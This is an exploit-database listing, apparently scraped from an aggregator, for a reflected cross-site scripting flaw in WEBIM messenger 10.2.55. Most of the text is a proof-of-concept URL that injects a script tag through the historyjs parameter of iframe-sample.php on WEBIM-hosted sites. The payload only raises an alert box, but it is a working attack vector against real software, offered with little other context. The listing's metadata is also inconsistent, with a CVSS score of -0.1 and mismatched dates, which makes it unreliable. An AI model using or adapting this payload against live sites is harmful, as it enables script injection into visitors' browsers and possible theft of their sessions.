Exploit for WEBIM 10.2.55 Cross Site Scripting

Name: Exploit for WEBIM 10.2.55 Cross Site Scripting
Rating: 5 (214 reviews)

2021-03-10 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:161738
# Exploit Title: XSS in WEBIM <http://WEBIM.RU> web application  
# Date: 10.08.2021  
# Exploit Author: ASCII  
# Vendor Homepage: HTTPS://WEBIM.RU  
# Version: 10.2.55  
# Tested on: 10.2.55  
Webim messanger XSS  
  
POC  
  
https://[location].webim.ru/webim/iframe-sample.php?historyjs=1%27"()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>&location=test&redirected=0&webim-visitor=2&webimVisitor=1